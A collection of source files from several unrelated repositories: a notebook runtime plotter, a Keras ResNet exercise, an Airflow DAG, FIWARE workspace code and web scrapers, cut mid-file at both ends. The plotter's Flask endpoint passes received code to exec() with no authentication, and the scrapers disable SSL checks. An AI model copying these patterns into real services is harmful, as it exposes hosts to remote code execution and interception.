prepare_txt_file_content(val_files) print('writing val txt, number of val images={n}'.format(n=len(val))) with open(val_path, 'w') as val_file: val_file.writelines(val) ############# Test ########################################################## test = prepare_txt_file_content(evaluation_files) print('writing test txt, number of test images={n}'.format(n=len(test))) with open(test_path, 'w') as test_file: test_file.writelines(test) ```
{ "source": "aabdinur2021/W200-Project1", "score": 3 }
#### File: runtime_plotter_src/src/hist_plotter.py ```python import numpy as np import pandas as pd from bokeh.io import show, curdoc from bokeh.models import NumeralTickFormatter, HoverTool, ColumnDataSource from bokeh.plotting import figure class HistogramPlotter: """ Plots a histogram using bokeh """ def __init__(self, execution_times, colors=['#4682B4', '#D2B48C']): """ Initialize plotter with the execution times of a notebook :param execution_times: How long each notebook code cell took :param colors: Colors in hexadecimal - Ascii colors don't work when running from command line """ self.execution_times = execution_times self.colors = colors def plot(self, show_plot=True): """ Plot a histogram using the data provided for the plotter :param show_plot: whether to display the plot or not :return: None """ # Get all the execution times. data = list(self.execution_times.values()) # Create dynamic bins based on the data. bins = np.arange(np.floor(min(data)), np.ceil(max(data))) # Create histogram using numpy hist, edges = np.histogram(data, weights=np.ones(len(data)) / len(data), density=1, bins=bins) # Create pandas from numpy histogram. This is used for hoverTool arr_df = pd.DataFrame({'count': hist, 'left': edges[:-1], 'right': edges[1:]}) arr_df['f_count'] = [count for count in arr_df['count']] arr_df['f_interval'] = ['%d to %d ' % (left, right) for left, right in zip(arr_df['left'], arr_df['right'])] # User a dark theme for the histogram curdoc().theme = 'dark_minimal' arr_src = ColumnDataSource(arr_df) # Use Bokeh to plot the histogram using the numpy data provided p = figure(title="Histogram of {}".format("How Fast is my code?"), x_axis_label="Runtime (ms)", y_axis_label="Distribution (%)", sizing_mode='stretch_both', tools='pan') p.quad(top='count', source=arr_src, bottom=0, left='left', right='right', line_color=self.colors[0], fill_color=self.colors[1], fill_alpha=0.7) # Create a HoverTool to show the runtime and distribution hover = HoverTool(tooltips=[('Runtime (ms)', '@f_interval'), ('Distribution (%)', '@f_count{%0.2f}')]) # Format the y axis with % and add hoverPlot p.yaxis.formatter = NumeralTickFormatter(format='0 %') p.add_tools(hover) # show plot if true if show_plot: show(p) ``` #### File: runtime_plotter_src/src/main.py ```python import getopt import sys from flask import Flask from flask_cors import CORS from nb_processor_controller import nb_controller_blue_print app = Flask(__name__) CORS(app) def main(argv): opts, args = getopt.getopt(argv, "hp:") host = 'localhost' port = 8000 for opt in opts: if opt[0] == '-h': print("python main.py -p <port>") exit(0) elif opt[0] == '-p': port = opt[1] app.register_blueprint(nb_controller_blue_print) app.run(host, port) if __name__ == "__main__": main(sys.argv[1:]) ``` #### File: runtime_plotter_src/src/nb_executor.py ```python import datetime from invalid_nb_error import InvalidNotebookError import logging class NotebookExecutor: def __init__(self, notebook_data): self.notebook_data = notebook_data self.execution_times = {} def execute(self): """ Execute all code cells in the notebook :return: """ # Store the execution times of all cells self.execution_times = {} for i in range(len(self.notebook_data)): notebook_element = self.notebook_data[i] # Only process code cells if notebook_element['cell_type'] == 'code': try: start_time = datetime.datetime.now() # provide globals to exec so as to use the global context for processing the request exec(notebook_element['source'], None, globals()) execution_time = datetime.datetime.now() - start_time # Calculate the execution time self.execution_times[i] = round(execution_time.total_seconds() * 1000) except Exception: # If any exception is encountered, log the exception and process the other requests logging.error("Code can't be executed: " + notebook_element['source']) # If no code was executed, throw an invalid request if len(self.execution_times) < 1: logging.error("No Executable Code Found") raise InvalidNotebookError(len(self.execution_times)) return self.execution_times ``` #### File: runtime_plotter_src/src/nb_processor_controller.py ```python import logging from flask import request, abort, Blueprint from nb_processor_service import NBService from invalid_nb_error import InvalidNotebookError from no_content_nb_error import NoContentNotebookError nb_controller_blue_print = Blueprint("nb_processor_controller", __name__) @nb_controller_blue_print.route('/notebook_data', methods=['POST']) def notebook_data(): """ Exposes a single Flask endpoint which gets all the notebook elements to process - In case notebook contains no data or no code cells, throw a 400 bad request :return: None """ # POST request notebook_elements = request.get_json() logging.info('The current request received is: ', notebook_elements) try: logging.info("Starting Processing Notebook Data") # Create a Service with the notebook elements and received from the request nb_svc = NBService(notebook_elements) # Process all the notebook elements nb_svc.process() logging.info("Completed Processing Notebook Data") except (InvalidNotebookError, NoContentNotebookError) as e: # In case notebook contains no elements or no code cells, throw a 400 bad request logging.error(e) abort(400) return 'OK', 200 ``` #### File: aabdinur2021/W200-Project1/setup.py ```python import getopt import sys import os from distutils.dir_util import copy_tree WINDOWS_PATH = "C:\\Users\\user_name\\AppData\Roaming\\jupyter\\nbextensions" LINUX_PATH = "/usr/local/share/jupyter/nbextensions/" def setup(argv): opts, args = getopt.getopt(argv, "o:u:") oper_sys = 'linux' user_name = '' extension_name = 'runtime_plotter' for opt in opts: print(opt) if opt[0] == '-o': oper_sys = opt[1] elif opt[0] == '-u': user_name = opt[1] if 'win' in oper_sys.lower(): win_path = WINDOWS_PATH.replace("user_name", user_name) path = win_path + "\\" + extension_name os.mkdir(path) copy_tree("runtime_plotter_extension", path) else: path = LINUX_PATH + extension_name os.mkdir(path) copy_tree("runtime_plotter_extension/", path) if __name__ == "__main__": setup(sys.argv[1:]) ```
{ "source": "AAbdoli/deepLearning", "score": 3 }
#### File: AAbdoli/deepLearning/residual.py ```python import numpy as np from keras import layers from keras.layers import Input, Add, Dense, Activation, ZeroPadding2D, BatchNormalization, Flatten, Conv2D, AveragePooling2D, MaxPooling2D, GlobalMaxPooling2D from keras.models import Model, load_model from keras.preprocessing import image from keras.utils import layer_utils from keras.utils.data_utils import get_file from keras.applications.imagenet_utils import preprocess_input import pydot from IPython.display import SVG from keras.utils.vis_utils import model_to_dot from keras.utils import plot_model from resnets_utils import * from keras.initializers import glorot_uniform import scipy.misc from matplotlib.pyplot import imshow %matplotlib inline import keras.backend as K K.set_image_data_format('channels_last') K.set_learning_phase(1) def identity_block(X, f, filters, stage, block): conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' F1, F2, F3 = filters X_shortcut = X X = Conv2D(filters = F1, kernel_size = (1, 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X) X = Activation('relu')(X) X = Conv2D(filters = F2, kernel_size = (f, f), strides = (1,1), padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X) X = Activation('relu')(X) X = Conv2D(filters = F3, kernel_size = (1 , 1), strides = (1,1), padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X) X = layers.Add()([X,X_shortcut]) X = Activation('relu')(X) return X tf.reset_default_graph() with tf.Session() as test: np.random.seed(1) A_prev = tf.placeholder("float", [3, 4, 4, 6]) X = np.random.randn(3, 4, 4, 6) A = identity_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, block = 'a') test.run(tf.global_variables_initializer()) out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0}) def convolutional_block(X, f, filters, stage, block, s = 2): conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' F1, F2, F3 = filters X_shortcut = X X = Conv2D(F1, (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '2a', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2a')(X) X = Activation('relu')(X) X = Conv2D(F2, (f, f), strides = (1,1),padding = 'same', name = conv_name_base + '2b', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2b')(X) X = Activation('relu')(X) X = Conv2D(F3, (1, 1), strides = (1,1),padding = 'valid', name = conv_name_base + '2c', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = bn_name_base + '2c')(X) X_shortcut = Conv2D(F3, (1, 1), strides = (s,s),padding = 'valid', name = conv_name_base + '1', kernel_initializer = glorot_uniform(seed=0))(X_shortcut) X_shortcut = BatchNormalization(axis = 3, name = bn_name_base + '1')(X_shortcut) X = layers.Add()([X,X_shortcut]) X = Activation('relu')(X) return X tf.reset_default_graph() with tf.Session() as test: np.random.seed(1) A_prev = tf.placeholder("float", [3, 4, 4, 6]) X = np.random.randn(3, 4, 4, 6) A = convolutional_block(A_prev, f = 2, filters = [2, 4, 6], stage = 1, block = 'a') test.run(tf.global_variables_initializer()) out = test.run([A], feed_dict={A_prev: X, K.learning_phase(): 0}) def ResNet50(input_shape = (64, 64, 3), classes = 6): X_input = Input(input_shape) X = ZeroPadding2D((3, 3))(X_input) X = Conv2D(64, (7, 7), strides = (2, 2), name = 'conv1', kernel_initializer = glorot_uniform(seed=0))(X) X = BatchNormalization(axis = 3, name = 'bn_conv1')(X) X = Activation('relu')(X) X = MaxPooling2D((3, 3), strides=(2, 2))(X) X = convolutional_block(X, f = 3, filters = [64, 64, 256], stage = 2, block='a', s = 1) X = identity_block(X, 3, [64, 64, 256], stage=2, block='b') X = identity_block(X, 3, [64, 64, 256], stage=2, block='c') X = convolutional_block(X, f = 3, filters = [128, 128, 512], stage = 3, block='a', s = 2) X = identity_block(X, 3, [128, 128, 512], stage=3, block='b') X = identity_block(X, 3, [128, 128, 512], stage=3, block='c') X = identity_block(X, 3, [128, 128, 512], stage=3, block='d') X = convolutional_block(X, f = 3, filters = [256, 256, 1024], stage = 4, block='a', s = 2) X = identity_block(X, 3, [256, 256, 1024], stage=4, block='b') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='c') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='d') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='e') X = identity_block(X, 3, [256, 256, 1024], stage=4, block='f') X = convolutional_block(X, f = 3, filters = [512, 512, 2048], stage = 5, block='a', s = 2) X = identity_block(X, 3, [512, 512, 2048], stage=5, block='b') X = identity_block(X, 3, [512, 512, 2048], stage=5, block='c') X = AveragePooling2D(pool_size=(2, 2), strides=None, padding='valid', name='avg_pool')(X) X = Flatten()(X) X = Dense(classes, activation='softmax', name='fc' + str(classes), kernel_initializer = glorot_uniform(seed=0))(X) model = Model(inputs = X_input, outputs = X, name='ResNet50') return model model = ResNet50(input_shape = (64, 64, 3), classes = 6) model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy']) X_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset() X_train = X_train_orig/255. X_test = X_test_orig/255. Y_train = convert_to_one_hot(Y_train_orig, 6).T Y_test = convert_to_one_hot(Y_test_orig, 6).T model.fit(X_train, Y_train, epochs = 2, batch_size = 32) preds = model.evaluate(X_test, Y_test) print ("Loss = " + str(preds[0])) print ("Test Accuracy = " + str(preds[1])) model = load_model('ResNet50.h5') preds = model.evaluate(X_test, Y_test) print ("Loss = " + str(preds[0])) print ("Test Accuracy = " + str(preds[1])) ```
{ "source": "AAbdul12/Data-engineering-nanodegree", "score": 3 }
#### File: exercises/dags/1_ex6_redshift_queries.py ```python import datetime import logging from airflow import DAG from airflow.contrib.hooks.aws_hook import AwsHook from airflow.hooks.postgres_hook import PostgresHook from airflow.operators.postgres_operator import PostgresOperator from airflow.operators.python_operator import PythonOperator import sql_statements def load_data_to_redshift(*args, **kwargs): aws_hook = AwsHook("aws_credentials") credentials = aws_hook.get_credentials() redshift_hook = PostgresHook("redshift") redshift_hook.run(sql_statements.COPY_ALL_TRIPS_SQL.format(credentials.access_key, credentials.secret_key)) dag = DAG( 'lesson1.solution6', start_date=datetime.datetime.now() ) create_table = PostgresOperator( task_id="create_table", dag=dag, postgres_conn_id="redshift", sql=sql_statements.CREATE_TRIPS_TABLE_SQL ) copy_task = PythonOperator( task_id='load_from_s3_to_redshift', dag=dag, python_callable=load_data_to_redshift ) location_traffic_task = PostgresOperator( task_id="calculate_location_traffic", dag=dag, postgres_conn_id="redshift", sql=sql_statements.LOCATION_TRAFFIC_SQL ) create_table >> copy_task copy_task >> location_traffic_task ```
{ "source": "aabdullah-bos/yaci", "score": 2 }
#### File: yaci/examples/cool_api.py ```python def get(*args): print("In cool_api with args {}".format(args)) return args ``` #### File: yaci/tests/test_cache_storage.py ```python from __future__ import absolute_import from __future__ import print_function from __future__ import division from __future__ import unicode_literals import mock from yaci import cache_manager class TestCacheManager(object): def setup(self): self.test_storage = {'foo': 'bar', 'baz': 'boo'} self.mock_storage = mock.MagicMock() self.mock_storage.get.side_effect = self.getitem self.mock_storage.store.side_effect = self.setitem self.mock_storage.cached.side_effect = lambda x: x in self.test_storage self.cache_manager = cache_manager.CacheManager(self.mock_storage) def getitem(self, key): return self.test_storage[key] def setitem(self, key, value): self.test_storage[key] = value def teardown(self): pass def test_init(self): cm = self.cache_manager msg = "Unexpected value for storage." assert cm.storage == self.mock_storage, msg def test_get(self): cm = self.cache_manager for key, value in self.test_storage.items(): expected = self.test_storage[key] actual = cm[key] msg = "Expected %s got {0}, for key {1}".format(expected, actual) assert expected == actual, msg def test_store(self): cm = self.cache_manager key = 'boob' value = 'food' cm[key] = value actual = cm[key] msg = "Expected {0} got {1}, for key {2}".format(value, actual, key) assert value == actual, msg def test_default_get(self): cm = self.cache_manager key = 'braut' value = 'vurst' def do_something(x): return x actual = cm.default_get(key, do_something, value) msg = "Expected {0} got {1}, for key {2}".format(value, actual, key) assert value == actual, msg ```
{ "source": "aabdulwahed/cloudpots", "score": 3 }
#### File: agent/client/config.py ```python import os from ConfigParser import ConfigParser from configobj import ConfigObj _config_file = 'resource.conf' class Configuration(): def __init__(self): self._config = ConfigParser() def load_config(self, filename): if os.path.exists(filename): self._config.read(filename) return self._config._sections else: return None def reset_config(self, filename, configurations): config = ConfigObj() for k,v in configurations.iteritems(): print k,v if os.path.exists(filename): config.filename = filename config['RESOURCES'] = {} config['RESOURCES']['cpu'] = configurations['RESOURCES']['cpu'] config['RESOURCES']['mem'] = configurations['RESOURCES']['mem'] config['RESOURCES']['ports'] = configurations['RESOURCES']['ports'] config.write() return True else: return False ``` #### File: agent/client/request.py ```python import os, sys import urllib2 import traceback import httplib import simplejson as json class Request(): def send_request(self,request): try: return urllib2.urlopen(request).read() except urllib2.HTTPError, e: return json.dumps({'ERROR': 'HTTPError = ' + str(e.code)}) except urllib2.URLError, e: return json.dumps({'ERROR': 'URLError = ' + str(e.reason)}) except httplib.HTTPException, e: return json.dumps({'ERROR': 'HTTPException'}) except Exception: return json.dumps({'ERROR': 'generic exception: ' + traceback.format_exc()}) ```
{ "source": "aabdulwahed/wms", "score": 2 }
#### File: app/api/views.py ```python from app.models import * from app.fiware import fiware from wms import settings from rest_framework.views import APIView from rest_framework.renderers import JSONRenderer from rest_framework.response import Response class UpdateStatus(APIView): renderer_classes = (JSONRenderer,) def get(self,request, format=None): try: apikey = request.GET.get('apikey') device_id = request.GET.get('devid') type = request.GET.get('type') workspace = WorkSpace.objects.get(ws_id=device_id) service = Service.objects.get(apikey=apikey) fiware_obj = fiware.Fiware(settings.service_api, settings.workspace_api, settings.cbroker) fiware_obj.updateWorkspaceData(service.name, workspace.entity_name, apikey, device_id, type) except: return Response({'status':False}) return Response({'status': True}) ``` #### File: app/fiware/fiware.py ```python from request import Request from wms import settings import random, string import json class Fiware(): def __init__(self, serviceapi, workspaceapi, cbroker): self.requester = Request(serviceapi, workspaceapi, cbroker) def registerService(self, name): try: apikey = ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(20)) entity_type = settings.entity_type resource = settings.resouce cbroker = settings.cbroker header = {"Content-type": "application/json", "Fiware-Service": name, "Fiware-ServicePath": "/"} data = '{"services":[{"apikey":"%s","cbroker":"%s","entity_type":"%s","resource":"%s"}]}'%(apikey, cbroker, entity_type, resource) #raise Exception(data) self.requester.sendPostRequest(header, data, settings.service_api) return {"apikey":apikey, "entity_type": entity_type, "cbroker": cbroker, "resource": resource, "name":name} except: return False def registerWorkspace(self, apikey, service, workspace, entity, device_id, protocol, timezone, maxsize, address, long, lat): try: header = {"Content-type": "application/json", "Fiware-Service": service, "Fiware-ServicePath": "/"} data = '{"devices": [{"device_id": "%s","entity_name": "%s","entity_type": "%s","protocol": "%s","timezone": "%s","attributes": [{"object_id": "n","name": "name","type": "string"},{"object_id": "a","name": "address","type": "string"},{"object_id": "lat","name": "latitude","type": "string"},{"object_id": "long","name": "longitude","type": "string"},{"object_id": "max","name": "maximumnumber", "type": "int"},{"object_id": "cur","name": "currentstatus","type": "int"}]}]}'%(device_id, workspace, entity, protocol, timezone) if self.requester.sendPostRequest(header, data, settings.workspace_api): print ("REGISTER DONE!") # curl "http://130.206.126.55:7896/iot/d?k=4jggokgpepnvsb2uv4s40d0000&i=112255" # -d 'n|cairo lib#a|5 ahmed zewil#lat|25.3#long|23.6#max|50' -H "Content-type: text/plain" header = {"Content-type": "text/plain"} data = 'n|%s#a|%s#lat|%s#long|%s#max|%s'%(workspace, address, long, lat, maxsize) try: self.requester.sendPostRequest(header, data, '%s?k=%s&i=%s'%(settings.device_api, apikey, device_id)) except: return False return True except: return False def listWorkspaces(self, service, workspaces): try: header = { "Content-type": "application/json", "Fiware-Service": service } values = [] for ws in workspaces: data = '{"entities": [{"type": "","id": "%s","isPattern": "false"}],"attributes": []}'%(ws) r = self.requester.sendPostRequest(header, data, settings.ngsi_api) val = json.loads(r) values.append({ws: val['contextResponses'][0]['contextElement']['attributes']}) #raise Exception(values) return values except: return False def updateDevices(self): return True def filterData(self, data, currentstatus=None, address=None, lat=None, long=None, maxsize=None): wss = [] #try: for el in data: for k,v in el.iteritems(): for attr in v: #raise Exception(attr.keys()[1]) if 'longitude' == attr[attr.keys()[1]]: long = attr['value'] if 'latitude' == attr[attr.keys()[1]]: lat = attr['value'] if 'maximumnumber' == attr[attr.keys()[1]]: maxsize = attr['value'] if 'address' == attr[attr.keys()[1]]: address = attr['value'] if 'currentstatus' == attr[attr.keys()[1]]: currentstatus = attr['value'] if currentstatus == u' ': currentstatus = 0 wss.append({ 'name':k, 'long': long, 'lat': lat, 'maxsize':maxsize, 'address':address, 'current': currentstatus }) return wss def updateWorkspaceData(self, service, ws_name, apikey, device_id, type='increment'): #try: header = { "Content-type": "application/json", "Fiware-Service": service } data = '{"entities": [{"type": "","id": "%s","isPattern": "false"}],"attributes": [ "currentstatus","maximumnumber" ]}'%(ws_name) r = self.requester.sendPostRequest(header, data, settings.ngsi_api) output = json.loads(r) currentstatus = 0 maximumnumber = 0 for attr in output['contextResponses'][0]['contextElement']['attributes']: if 'currentstatus' in attr['name']: currentstatus = attr['value'] if 'maximumnumber' in attr['name']: maximumnumber = attr['value'] if maximumnumber: #update current status # curl "http://130.206.126.55:7896/iot/d?k=4jggokgpepnvsb2uv4s40d0000&i=112255" -d 'cur|38' -H "Content-type: text/plain" header = {"Content-type": "text/plain"} if currentstatus == ' ': currentstatus=0 if type == 'increment': currentstatus = int(currentstatus) + 1 if currentstatus >= int(maximumnumber): currentstatus = int(maximumnumber) data = 'currentstatus|%d'%(int(currentstatus)) else: currentstatus = int(currentstatus) - 1 data = 'currentstatus|%d' % (currentstatus) if currentstatus <=0: data = 'currentstatus|0' domain = '%s?k=%s&i=%s'%(settings.device_api, apikey, device_id) self.requester.sendPostRequest(header, data, domain) return ({'maximumnumber': maximumnumber, 'currentstatus':currentstatus}) ``` #### File: app/fiware/service.py ```python import sys from fiware import Fiware class Service(): def __init__(self): self.fiware = Fiware() ``` #### File: wms/app/forms.py ```python from django import forms from .models import * class RegisterForm(forms.Form): iquery_choices = [(s.name, s.name) for s in Service.objects.all()] entity_name=forms.CharField(label="Workspace Name", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) maxsize=forms.CharField(label="Max No. of spots", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) location_long=forms.CharField(label="Location longitude", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) location_lat = forms.CharField(label="Location latitude", widget=forms.TextInput(attrs={"class": "form-control input-md"})) address = forms.CharField(label="Address", widget=forms.TextInput(attrs={"class": "form-control input-md"})) services = forms.ChoiceField(iquery_choices,label="Service Name", widget=forms.Select(attrs={'class':'form-control input-md'})) def clean(self): cleaned_data=super(RegisterForm,self).clean() return cleaned_data class ServiceForm(forms.Form): name=forms.CharField(label="Service Name", widget = forms.TextInput(attrs = {"class":"form-control input-md"})) def clean(self): cleaned_data=super(ServiceForm,self).clean() return cleaned_data ```
{ "source": "aAbdz/cylindrical_shape_decomposition", "score": 3 }
#### File: cylindrical_shape_decomposition/CSD/coord_conv.py ```python import numpy as np def cart2pol(x,y): rho=np.sqrt(x**2+y**2) phi=np.arctan2(y,x) phi=phi*(180/np.pi) return(rho,phi) def pol2cart(rho, phi): phi=phi*(np.pi/180) x=rho*np.cos(phi) y=rho*np.sin(phi) return(x,y) ``` #### File: cylindrical_shape_decomposition/CSD/hausdorff_distance.py ```python import numpy as np from scipy.spatial.distance import directed_hausdorff def hausdorff_distance(curve1,curve2,n_sampling): s1=np.floor(np.linspace(0,len(curve1)-1,n_sampling)).astype(int) s2=np.floor(np.linspace(0,len(curve2)-1,n_sampling)).astype(int) u=curve1[s1] v=curve2[s2] curve_dist=max(directed_hausdorff(u, v)[0], directed_hausdorff(v, u)[0]) return curve_dist ``` #### File: cylindrical_shape_decomposition/CSD/plane_rotation.py ```python import numpy as np def rotate_vector(vector, rot_mat): "rotating a vector by a rotation matrix" rotated_vec = np.dot(vector,rot_mat) return rotated_vec def rotation_matrix_3D(vector, theta): """counterclockwise rotation about a unit vector by theta radians using Euler-Rodrigues formula: https://en.wikipedia.org/wiki/Euler-Rodrigues_formula""" a=np.cos(theta/2.0) b,c,d=-vector*np.sin(theta/2.0) aa,bb,cc,dd=a**2, b**2, c**2, d**2 bc,ad,ac,ab,bd,cd=b*c, a*d, a*c, a*b, b*d, c*d rot_mat=np.array([[aa+bb-cc-dd, 2*(bc+ad), 2*(bd-ac)], [2*(bc-ad), aa+cc-bb-dd, 2*(cd+ab)], [2*(bd+ac), 2*(cd-ab), aa+dd-bb-cc]]) return rot_mat def unit_normal_vector(vec1, vec2): n = np.cross(vec1, vec2) if np.array_equal(n, np.array([0, 0, 0])): n = vec1 s = max(np.sqrt(np.dot(n,n)), 1e-5) n = n/s return n def angle(vec1, vec2): theta=np.arccos(np.dot(vec1,vec2) / (np.sqrt(np.dot(vec1,vec1)) * np.sqrt(np.dot(vec2, vec2)))) return theta ``` #### File: cylindrical_shape_decomposition/CSD/polar_parametrization.py ```python import numpy as np from coord_conv import cart2pol, pol2cart def polar_parametrization(curve, c_mesh): r,phi = cart2pol(curve[:,1]-c_mesh,curve[:,0]-c_mesh) s=phi<0 s_inx=np.where(s)[0] s_inx=s_inx[np.argmin(abs(phi[s_inx]))] nphi=np.append(phi[s_inx:],phi[:s_inx]) nr=np.append(r[s_inx:],r[:s_inx]) for i in range(3): d_ang=np.diff(nphi) d_ang=np.append(nphi[0],d_ang) cw_direction=np.sign(d_ang)>=0 if sum(cw_direction)>(len(cw_direction)/2): 'error' else: cw_dir=np.where(cw_direction)[0] cw_dir=cw_dir[abs(d_ang[cw_direction])<350] nr=np.delete(nr,cw_dir) nphi=np.delete(nphi,cw_dir) sign_change=np.where((nphi[1:]*nphi[:-1])<0)[0] if len(sign_change)>1: over_st_point=np.where(nphi<nphi[0])[0] over_st_point=over_st_point[over_st_point>sign_change[1]] nr=np.delete(nr,over_st_point) nphi=np.delete(nphi,over_st_point) x,y=pol2cart(nr,nphi) curve=np.array([y+c_mesh,x+c_mesh]).T return curve ```
{ "source": "aabedi/weatherScraper", "score": 3 }
#### File: weatherScraper/spiders/weatherbot.py ```python from weatherScraper.items import TempData from weatherScraper.items import InputData import scrapy class WeatherbotSpider(scrapy.Spider): name = 'weatherbot' allowed_domains = ['www.wunderground.com'] start_urls = ['http://www.wunderground.com/history/'] def __init__(self, code='', month='', day='', year='', *args, **kwargs): # this will allow spider arguments super(WeatherbotSpider, self).__init__(*args, **kwargs) global user_input user_input = InputData() user_input['code'] = code user_input['month'] = month user_input['day'] = day user_input['year'] = year def parse(self, response): return scrapy.FormRequest.from_response( response, formnumber=1, # formnumber set to 1 because location and date are the second form on history page formdata={'code': user_input['code'], 'month': user_input['month'], 'day': user_input['day'], 'year': user_input['year']}, callback=self.after_post ) def after_post(self, response): # check input successful before moving on if "location you entered was not found" in response.body: self.logger.error("Location not valid") return temperatures = TempData() # Extract each temperature needed using corresponding css tags temperatures['actual_mean_temp'] = response.css('#historyTable tr:nth-child(2) .wx-value::text').extract() temperatures['avg_mean_temp'] = response.css('tr:nth-child(2) .indent~ td+ td .wx-value::text').extract() temperatures['actual_max_temp'] = response.css('tr:nth-child(3) .indent+ td .wx-value::text').extract() temperatures['avg_max_temp'] = response.css('#historyTable tr:nth-child(3) td:nth-child(3) .wx-value::text')\ .extract() temperatures['record_max_temp'] = response.css('tr:nth-child(3) td:nth-child(4) .wx-value::text').extract() temperatures['actual_min_temp'] = response.css('tr:nth-child(4) .indent+ td .wx-value::text').extract() temperatures['avg_min_temp'] = response.css('#historyTable tr:nth-child(4) td:nth-child(3) .wx-value::text')\ .extract() temperatures['record_min_temp'] = response.css('#historyTable tr:nth-child(4) td:nth-child(4) .wx-value::text')\ .extract() # Check if Fahrenheit or Celsius, then append correct unit if 'C' in response.css('tr:nth-child(3) .indent+ td .wx-unit::text'): for key, value in temperatures.iteritems(): value.append('C') else: for key, value in temperatures.iteritems(): value.append('F') yield temperatures ```
{ "source": "aabele/octa-latvija", "score": 3 }
#### File: aabele/octa-latvija/app.py ```python from __future__ import unicode_literals import random from flask import Flask from flask import render_template from flask import send_from_directory from flask.json import jsonify from flask_cache import Cache from scrapers import query_octa_providers DEBUG = True CACHE_PERIOD = 60 * 60 * 24 try: from local_settings import * except ImportError: pass app = Flask(__name__, static_url_path='/static') cache = Cache(app,config={'CACHE_TYPE': 'simple'}) def randint(): """ Select random integer between 00 and 99 :return: integer """ return random.randint(00, 99) def get_random_prices(): """ Generate random price array :return: array of prices|[] """ return ['%s.%s' % (randint(), randint()) for i in range(4)] @app.route('/api/provider-check/<provider>/<car_id>/<certificate_id>/', methods=['GET']) @cache.cached(timeout=CACHE_PERIOD) def fetch_prices(provider, car_id, certificate_id): """ Fetch the prices for specific car from specific provider :param provider: provider name|str :param car_id: car number|str :param certificate_id: certificate number|str :return: Array of results """ if DEBUG: data = get_random_prices() else: try: data = query_octa_providers(provider, car_id, certificate_id) except: data = [] return jsonify(data) @app.route('/', methods=['GET']) def front_page(): """ Render front page template :return: rendered contents """ return render_template('base.html') @app.route('/static/<path:path>', methods=['GET']) def send_static(path): """ Serve static content from /static directory :param path: asset path|str :return: """ return send_from_directory('static', path) if __name__ == "__main__": app.run() ``` #### File: octa-latvija/scrapers/__init__.py ```python from scrapers.providers.baltikums import BaltikumsOCTAScraper from scrapers.providers.compensa import CompensaOCTAScraper from scrapers.providers.gjensidige import GjensidigeOCTAScraper from scrapers.providers.if_company import IfOCTAScraper from scrapers.providers.seesam import SeesamOCTAScraper class_map = { 'baltikums': BaltikumsOCTAScraper, 'compensa': CompensaOCTAScraper, 'gjensidige': GjensidigeOCTAScraper, 'if_company': IfOCTAScraper, 'seesam': SeesamOCTAScraper } def query_octa_providers(provider, car_id, passport_id): """ :param provider: :param car_id: :param passport_id: :return: """ scraper_class = class_map.get(provider) if not scraper_class: raise Exception("Can't find such provider") scraper = scraper_class(car_id, passport_id) return scraper.get_data() ``` #### File: scrapers/providers/gjensidige.py ```python from __future__ import unicode_literals from scrapers.base import OCTAScraper class GjensidigeOCTAScraper(OCTAScraper): """ Gjensidige scraper class """ base_url = 'https://www.gjensidige.lv/pirkt-octa/online-service' car_id_xpath = '//input[@id="VehicleRegistrationNumber"]' passport_id_xpath = '//input[@id="VehicleRegCertificateNumber"]' submit_button_xpath = '//button[@class="btn next"]' results_loaded_text = '9 mēneši' def _parse_results(self): """ Parse website insurance offer details :return: list of containing prices [3months, 6months, 9months, 12months] """ response = [] items = self.driver.find_elements_by_xpath('//div[@id="packages"]//span[@style="font-size:18px;"]') for item in items: response.append(item.text.split(' ')[0].replace(',', '.')) return response ```
{ "source": "aabele/ssscraper", "score": 3 }
#### File: ssscraper/ssscraper/base.py ```python from __future__ import unicode_literals import random import string from selenium import webdriver from selenium.common import exceptions from selenium.webdriver.common.desired_capabilities import DesiredCapabilities # Phantom JS config phantomjs_config = dict(DesiredCapabilities.PHANTOMJS) phantomjs_params = ['--ignore-ssl-errors=true', '--ssl-protocol=any', '--web-security=false'] PHANTOMJS_EXECUTABLE_PATH = 'phantomjs' class Scraper(object): """ SS.lv scraper """ base_url = 'https://www.ss.lv' post_date_filter = { 1: 'Šodien', 2: 'Par 2 dienām', 5: 'Par 5 dienām' } def __init__(self): self.driver = webdriver.PhantomJS( PHANTOMJS_EXECUTABLE_PATH, desired_capabilities=phantomjs_config, service_args=phantomjs_params) self.driver.set_window_size(1024, 768) @staticmethod def random(length): """ Generate random string """ return ''.join(random.choice(string.ascii_letters) for i in range(length)) def get_categories(self): """ Get list of website top categories :return: [(title, url)], ...] :rtype: array """ self.driver.get(self.base_url) items = self.driver.find_elements_by_xpath('//table//a[@class="a1"]') return [(i.text, i.get_attribute('href')) for i in items] def get_subcategories(self, category_url): """ Get list of category sub categories :param category_url: top category url :type: string :return: [(title, url)], ...] :rtype: array """ self.driver.get(category_url) items = self.driver.find_elements_by_xpath('//table//a[@class="a_category"]') return [(i.text, i.get_attribute('href')) for i in items] def get_posts(self, subcategory_url, days=None): """ Get list of subcategory posts :param subcategory_url: top category url :type: string :param days: day filter - to filter posts by pub date :type: integer :return: [(title, url)], ...] :rtype: array """ if days and days not in self.post_date_filter: 